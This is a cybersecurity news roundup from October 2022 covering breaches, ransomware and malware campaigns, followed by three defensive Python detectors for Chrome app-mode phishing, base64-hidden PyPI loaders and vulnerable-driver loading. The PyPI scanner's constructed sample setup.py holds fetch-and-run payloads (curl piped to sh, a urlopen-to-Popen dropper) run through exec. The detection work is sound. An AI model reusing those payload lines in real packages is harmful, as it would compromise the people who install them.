- CISA has issued guidance on the transition to Traffic Light Protocol (TLP) version 2.0. The agency itself plans to migrate to the new version in November but has urged organizations to adopt it as soon as possible. The key changes are the renaming of TLP:WHITE to TLP:CLEAR and the new TLP:AMBER+STRICT label, which restricts sharing to the recipient's own organization (plain TLP:AMBER also permits sharing with clients), so sensitive information can be labeled and shared more precisely.
- CISA has issued a new Binding Operational Directive (BOD 23-01) that requires all federal civilian executive branch agencies to perform continuous asset discovery and vulnerability enumeration on their networks so that vulnerable systems can be identified and patched. Agencies must meet the directive's requirements and report their findings to CISA by April 2023.
- The Department of Homeland Security kicked off Cybersecurity Awareness Month, stressing its commitment to raising awareness of how to combat the ever-increasing threats from malicious cyber actors. It also encouraged public-private collaboration on threat sharing and on streamlining cybersecurity efforts.
- CommonSpirit Health disclosed a cybersecurity incident that affected several of its healthcare facilities across the U.S. An investigation is underway to determine the scope of the incident.
- Binance temporarily halted its BNB Smart Chain (BSC) blockchain after attackers exploited its cross-chain bridge to drain roughly $560 million worth of BNB. The firm responded quickly and blocked the attackers' access to roughly 80% of the stolen funds.
- A data breach at the Shangri-La hotel group compromised the personal information of its guests. The breach occurred between May and July, when attackers gained unauthorized access to its IT network, and affected hotels in Hong Kong, Singapore, Chiang Mai, Taipei, and Tokyo. The group said it has found no indication that any guest data has been misused.
- The RansomEXX ransomware gang has leaked internal documents online after claiming to have hacked Italian luxury sports car manufacturer Ferrari. Ferrari has acknowledged that documents were posted online but says it has no evidence of a breach of its systems. The 6.99 GB of data includes internal documents, datasheets, and repair manuals, among other material.
- Russian retail chain DNS (Digital Network System) suffered a data breach that exposed the personal information of customers and employees. The attackers gained initial access by exploiting flaws in the company's IT systems, which DNS says it is now fixing to strengthen its information security.
- More than 248,000 files belonging to the Los Angeles Unified School District (LAUSD) have been leaked on the dark web. The data belongs to students and their parents. The district was attacked by the Vice Society ransomware gang in September.
- Scammers are impersonating security researchers to sell fake proof-of-concept (PoC) exploits for the newly disclosed ProxyNotShell vulnerabilities in Microsoft Exchange (CVE-2022-41040 and CVE-2022-41082). Because the flaws are being exploited in the wild and are in high demand among cybercriminals, scammers are profiting by selling exploits that do not work.
- KFC and McDonald's customers in Saudi Arabia, the UAE, and Singapore were targeted in a phishing campaign that stole their payment details. According to researchers at CloudSEK, the attackers impersonated the restaurants' browser-based ordering apps to trick users into installing information-stealing payloads on their desktops.
- Threat actors are abusing Chrome's Application Mode in a new phishing technique to steal credentials. The feature, launched with the --app=URL command-line flag, opens a web page in a window without an address bar or other browser chrome, so a phishing page can be made to look like a local desktop login form. It is available in all Chromium-based browsers, including Google Chrome, Microsoft Edge, and Brave Browser.
- In a joint advisory, the NSA, CISA, and the FBI warned that threat actors used the open-source Impacket toolkit to gain an initial foothold in the network of a U.S. Defense Industrial Base (DIB) organization. The advisory also describes a custom tool, CovalentStealer, used to exfiltrate data from victims' systems.
- The group behind Magniber ransomware keeps changing its distribution method to evade detection. After switching the dropper's file extension from JSE to JS on September 16, the attackers have now switched again, from JS to WSF (Windows Script File).
- Zimperium researchers observed a campaign distributing a lesser-known Android spyware strain named RatMilad. The spyware is disguised as a mobile VPN app promoted through a Telegram channel and targets enterprise mobile devices in the Middle East.
- The NSA, CISA, and the FBI published a joint advisory listing the top 20 vulnerabilities exploited by Chinese state-sponsored threat groups. Most are remote code execution flaws in products from Atlassian, Microsoft (Exchange), F5 (BIG-IP), Zoho, and Sitecore (XP).
- A new infostealer named LilithBot has been linked to a Russia-based threat group called Jester, which has been active since January. The malware is distributed through a dedicated Telegram group and a Tor link.
- Malicious Office documents that abuse legitimate websites for hosting were found executing a script that ultimately dropped variants of Agent Tesla and njRAT, two trojans well known for collecting sensitive information from victims' devices.
- A newly identified campaign used a popular Chinese-language YouTube channel to distribute spyware-laced versions of the Tor Browser. The spyware campaign, named OnionPoison, collected data such as browsing history, social-networking account IDs, and Wi-Fi network identifiers.
- A malicious package on PyPI posing as the Raw-Tool library hid its payload with base64 encoding so that the malicious code would not be obvious during installation, helping it evade detection.
- The BlackByte ransomware group is using a new evasion tactic that abuses a known vulnerability in the legitimate, signed RTCore64.sys driver (part of MSI Afterburner; CVE-2019-16098) to disable more than 1,000 drivers on which security products rely for protection, a technique known as Bring Your Own Vulnerable Driver (BYOVD).
- Researchers investigated a Cheerscrypt ransomware attack that reused TTPs seen with Night Sky ransomware. Believed to be the work of the Emperor Dragonfly threat actor, Cheerscrypt can target both Windows systems and Linux-based VMware ESXi hosts.
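The Chrome Application Mode item above describes a lure whose whole point is that the address bar is gone. A check a practitioner would want is to flag Chromium browsers launched with --app= pointing somewhere other than the organization's own pinned apps, and to treat file: and data: targets as the spoofed-local-form case. The Python below is an added example written for this page, not code from Cyware or from the researchers who reported the technique. The process-creation log format, the ALLOWED_APP_HOSTS allowlist and the WATCHED_BRANDS list are assumptions, and the sample log lines are constructed.

```python
"""Flag Chromium browsers started in Application Mode (--app=URL) toward untrusted targets.

Added example for this page. The log line format, ALLOWED_APP_HOSTS and WATCHED_BRANDS
are assumptions; SAMPLE_LOG is constructed, not real telemetry.
"""
import ntpath
import re
import shlex
from urllib.parse import urlparse

CHROMIUM_IMAGES = {"chrome.exe", "msedge.exe", "brave.exe", "chromium.exe"}
# Assumption: hosts this organization legitimately pins as app-mode windows.
ALLOWED_APP_HOSTS = {"intranet.example.com", "mail.example.com"}
# Assumption: brands a lookalike host is likely to borrow, mapped to the real domain.
WATCHED_BRANDS = {"microsoftonline": "microsoftonline.com", "okta": "okta.com", "google": "google.com"}

# Assumed process-creation log format: "<ts> host=<name> user=<name> cmd=<command line>"
LOG_LINE = re.compile(r"^(?P<ts>\S+) host=(?P<host>\S+) user=(?P<user>\S+) cmd=(?P<cmd>.*)$")


def app_mode_target(cmdline):
    """Return (image_name, url) if cmdline starts a Chromium browser with --app=, else None."""
    try:
        argv = shlex.split(cmdline, posix=False)  # keep Windows backslashes intact
    except ValueError:  # unbalanced quotes
        return None
    if not argv:
        return None
    image = ntpath.basename(argv[0].strip('"')).lower()
    if image not in CHROMIUM_IMAGES:
        return None
    for arg in argv[1:]:
        arg = arg.strip('"')
        if arg.lower().startswith("--app="):
            return image, arg[len("--app="):]
    return None


def judge_url(url):
    """Return why an app-mode URL looks like a lure, or None if it is an allowlisted app."""
    parsed = urlparse(url)
    scheme = parsed.scheme.lower()
    host = (parsed.hostname or "").lower()
    if scheme in ("file", "data"):
        # A local HTML file rendered without an address bar is the classic spoofed login form.
        return f"app mode over {scheme}: URL"
    if scheme not in ("http", "https"):
        return f"unexpected scheme {scheme!r}"
    if host in ALLOWED_APP_HOSTS:
        return None
    for brand, real_domain in WATCHED_BRANDS.items():
        if brand in host and host != real_domain and not host.endswith("." + real_domain):
            return f"host {host} impersonates {real_domain}"
    return f"host {host} is not an allowlisted app"


def scan(lines):
    """Run both checks over log lines; return one alert dict per suspicious app-mode launch."""
    alerts = []
    for line in lines:
        m = LOG_LINE.match(line)
        if not m:
            continue
        hit = app_mode_target(m["cmd"])
        if not hit:
            continue
        image, url = hit
        reason = judge_url(url)
        if reason:
            alerts.append({"ts": m["ts"], "host": m["host"], "user": m["user"],
                           "image": image, "url": url, "reason": reason})
    return alerts


CHROME = r'"C:\Program Files\Google\Chrome\Application\chrome.exe"'
EDGE = r'"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"'
# Constructed sample log: one legitimate pinned app, two lures, one ordinary browser start.
SAMPLE_LOG = [
    f"2022-10-06T09:12:01Z host=WS01 user=alice cmd={CHROME} --app=https://intranet.example.com/hr",
    f"2022-10-06T09:14:37Z host=WS02 user=bob cmd={CHROME} --app=https://login.microsoftonline.com.verify-session.example/",
    f"2022-10-06T09:20:05Z host=WS03 user=carol cmd={EDGE} --app=file:///C:/Users/carol/AppData/Local/Temp/Office365.html",
    f"2022-10-06T09:21:44Z host=WS01 user=alice cmd={CHROME} https://www.google.com/",
]

if __name__ == "__main__":
    for alert in scan(SAMPLE_LOG):
        print(f'{alert["ts"]} {alert["host"]} {alert["user"]}: {alert["reason"]} ({alert["url"]})')
```

The brand check catches the usual trick of putting the real login hostname in a subdomain of an attacker-controlled domain; the allowlist keeps legitimately pinned internal apps quiet. Tune both to your environment before deploying the rule, and pair it with the Magniber item's lesson: the launcher that starts the --app= window (a .js, .jse or .wsf file run through wscript.exe) is itself worth alerting on.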
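The Raw-Tool item above describes the most common PyPI trick: the real payload sits in a base64 string inside setup.py, so a reviewer skimming the file sees only an opaque blob. The scanner below, an added example written for this page and not code from Cyware or from PyPI, parses a setup.py with Python's ast module, decodes every string or bytes literal that looks like base64 (peeling several layers, since double encoding is common), reports the ones whose plaintext contains loader-like tokens, and notes whether the literal flows into exec() or eval(). The sample setup.py and its payload strings are constructed, and the SUSPICIOUS indicator list is an assumption to tune.

```python
"""Find base64-hidden payloads in a package's setup.py and report whether they reach exec()/eval().

Added example for this page. SAMPLE_SETUP_PY and the payload strings are constructed;
the SUSPICIOUS indicator list is an assumption.
"""
import ast
import base64
import binascii
import re

B64_CHARS = re.compile(r"[A-Za-z0-9+/]+={0,2}")
# Assumption: tokens whose presence in decoded text marks a loader/dropper rather than data.
SUSPICIOUS = re.compile(r"\b(exec|eval|subprocess|Popen|os\.system|urllib|requests|socket|__import__)\b")


def peel_base64(text, max_layers=3):
    """Strip up to max_layers of base64; return (plaintext, layers) or (None, 0) if not base64."""
    current, layers = text, 0
    while layers < max_layers:
        compact = "".join(current.split())
        if len(compact) < 16 or len(compact) % 4 or not B64_CHARS.fullmatch(compact):
            break
        try:
            current = base64.b64decode(compact, validate=True).decode("utf-8")
        except (binascii.Error, UnicodeDecodeError):
            break
        layers += 1
    return (current, layers) if layers else (None, 0)


def _exec_reach(tree):
    """ids of constants placed inside exec()/eval() calls, and variable names referenced there."""
    consts, names = set(), set()
    for node in ast.walk(tree):
        if isinstance(node, ast.Call) and isinstance(node.func, ast.Name) and node.func.id in ("exec", "eval"):
            for sub in ast.walk(node):
                if isinstance(sub, ast.Constant):
                    consts.add(id(sub))
                elif isinstance(sub, ast.Name):
                    names.add(sub.id)
    return consts, names


def scan_source(source, filename="setup.py"):
    """Return findings for every string/bytes literal that hides base64-encoded loader code."""
    tree = ast.parse(source, filename)
    executed_consts, executed_names = _exec_reach(tree)
    assigned = {}  # id(constant node) -> variable it is assigned to, e.g. _cfg = "...."
    for node in ast.walk(tree):
        if (isinstance(node, ast.Assign) and len(node.targets) == 1
                and isinstance(node.targets[0], ast.Name) and isinstance(node.value, ast.Constant)):
            assigned[id(node.value)] = node.targets[0].id
    findings = []
    for node in ast.walk(tree):
        if not isinstance(node, ast.Constant) or not isinstance(node.value, (str, bytes)):
            continue
        value = node.value
        if isinstance(value, bytes):
            try:
                value = value.decode("ascii")
            except UnicodeDecodeError:
                continue
        decoded, layers = peel_base64(value)
        if decoded is None:
            continue
        indicators = sorted(set(SUSPICIOUS.findall(decoded)))
        if not indicators:
            continue  # base64 data (icons, text) with no code-like content
        reaches_exec = id(node) in executed_consts or assigned.get(id(node)) in executed_names
        findings.append({"file": filename, "line": node.lineno, "layers": layers,
                         "executed": reaches_exec, "indicators": indicators, "decoded": decoded[:120]})
    findings.sort(key=lambda f: f["line"])
    return findings


# Constructed payloads: what a dropper would run. They are only parsed here, never executed.
_STAGE1 = ('import urllib.request, subprocess\n'
           'subprocess.Popen(urllib.request.urlopen("http://198.51.100.7/drop").read(), shell=True)\n')
_STAGE2 = 'import os\nos.system("curl -s http://198.51.100.7/s | sh")\n'
_ENC1 = base64.b64encode(_STAGE1.encode()).decode()
_ENC2 = base64.b64encode(base64.b64encode(_STAGE2.encode())).decode()  # double-wrapped
_BENIGN = base64.b64encode(b"Thanks for installing raw-tool. Enjoy!").decode()

# Constructed setup.py imitating the page's scenario: a lookalike package with a hidden loader.
SAMPLE_SETUP_PY = f'''\
from setuptools import setup
import base64

README = "{_BENIGN}"
_cfg = "{_ENC1}"
exec(base64.b64decode(_cfg))
exec(base64.b64decode(base64.b64decode(b"{_ENC2}")))

setup(name="raw-tool", version="0.1.0", description="Raw Tool helper",
      long_description=base64.b64decode(README).decode())
'''

if __name__ == "__main__":
    for f in scan_source(SAMPLE_SETUP_PY):
        print(f'{f["file"]}:{f["line"]} layers={f["layers"]} executed={f["executed"]} {f["indicators"]}')
```

The README literal is base64 too, but decodes to plain text with no indicators, so it is not reported; that is the difference between "uses base64" (harmless, common) and "hides code in base64". Run this over every .py file in a package, not only setup.py, since the same loader is often placed in `__init__.py` so it runs on first import rather than at install time.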
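The BlackByte item above is a Bring Your Own Vulnerable Driver case, and the detail that matters for detection is that RTCore64.sys is a legitimately signed driver: a "signed = yes" filter will not catch it. The triage below, an added example for this page and not code from Cyware or Sophos, checks Sysmon "Driver loaded" (Event ID 6) records against three heuristics: a seed list of known-vulnerable driver names, loading from outside the Windows driver store, and an invalid signature. The records are constructed; the seed list is an assumption that should be replaced by Microsoft's vulnerable driver blocklist or a maintained BYOVD list (RTCore64.sys is the driver named on the page, the other two are well-known public examples).

```python
"""Triage Sysmon Event ID 6 (Driver loaded) records for Bring-Your-Own-Vulnerable-Driver activity.

Added example for this page. SAMPLE_EVENTS are constructed; KNOWN_VULNERABLE_DRIVERS is a seed
list (assumption) to be replaced by Microsoft's vulnerable driver blocklist or similar data.
"""
import ntpath

# Assumption: seed list keyed by lowercase file name. RTCore64.sys is the driver on this page.
KNOWN_VULNERABLE_DRIVERS = {
    "rtcore64.sys": "MSI Afterburner RTCore64 (CVE-2019-16098), abused by BlackByte",
    "dbutil_2_3.sys": "Dell dbutil (CVE-2021-21551)",
    "gdrv.sys": "Gigabyte gdrv",
}
TRUSTED_DRIVER_DIRS = (r"c:\windows\system32\drivers", r"c:\windows\system32\driverstore")


def assess_driver_load(event):
    """Return the reasons an Event ID 6 record is suspicious; an empty list means benign."""
    image = event["ImageLoaded"]
    name = ntpath.basename(image).lower()
    directory = ntpath.dirname(image).lower()
    reasons = []
    if name in KNOWN_VULNERABLE_DRIVERS:
        reasons.append(f"known vulnerable driver: {KNOWN_VULNERABLE_DRIVERS[name]}")
    if not any(directory == d or directory.startswith(d + "\\") for d in TRUSTED_DRIVER_DIRS):
        # Legitimate drivers are installed into the driver store; a driver dropped into a
        # user-writable folder and loaded from there is the typical BYOVD pattern.
        reasons.append(f"loaded from outside the driver store: {ntpath.dirname(image)}")
    if event.get("SignatureStatus", "").lower() != "valid":
        reasons.append(f"signature status {event.get('SignatureStatus', 'missing')!r}")
    return reasons


def triage(events):
    """Keep only suspicious records. A validly signed vulnerable driver still surfaces here,
    because the signature check alone would wave RTCore64.sys through."""
    results = []
    for ev in events:
        reasons = assess_driver_load(ev)
        if reasons:
            results.append({"image": ev["ImageLoaded"], "signer": ev.get("Signature", ""),
                            "reasons": reasons})
    return results


# Constructed records with the Sysmon Event ID 6 field names (ImageLoaded, Signature, SignatureStatus).
SAMPLE_EVENTS = [
    {"UtcTime": "2022-10-05 03:11:08.120", "ImageLoaded": r"C:\Windows\System32\drivers\ntfs.sys",
     "Signed": "true", "Signature": "Microsoft Windows", "SignatureStatus": "Valid"},
    {"UtcTime": "2022-10-05 03:12:41.507", "ImageLoaded": r"C:\Users\Public\RTCore64.sys",
     "Signed": "true", "Signature": "Micro-Star International", "SignatureStatus": "Valid"},
    {"UtcTime": "2022-10-05 03:12:59.002", "ImageLoaded": r"C:\Windows\Temp\svchost.sys",
     "Signed": "false", "Signature": "", "SignatureStatus": "Unavailable"},
]

if __name__ == "__main__":
    for hit in triage(SAMPLE_EVENTS):
        print(hit["image"], "signer=" + repr(hit["signer"]))
        for reason in hit["reasons"]:
            print("   -", reason)
```

Detection is the fallback; the preventive control is to block the vulnerable drivers from loading at all, which on Windows means enabling Microsoft's recommended driver block rules (applied through HVCI or a WDAC policy) and keeping that blocklist current.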
Posted on: October 07, 2022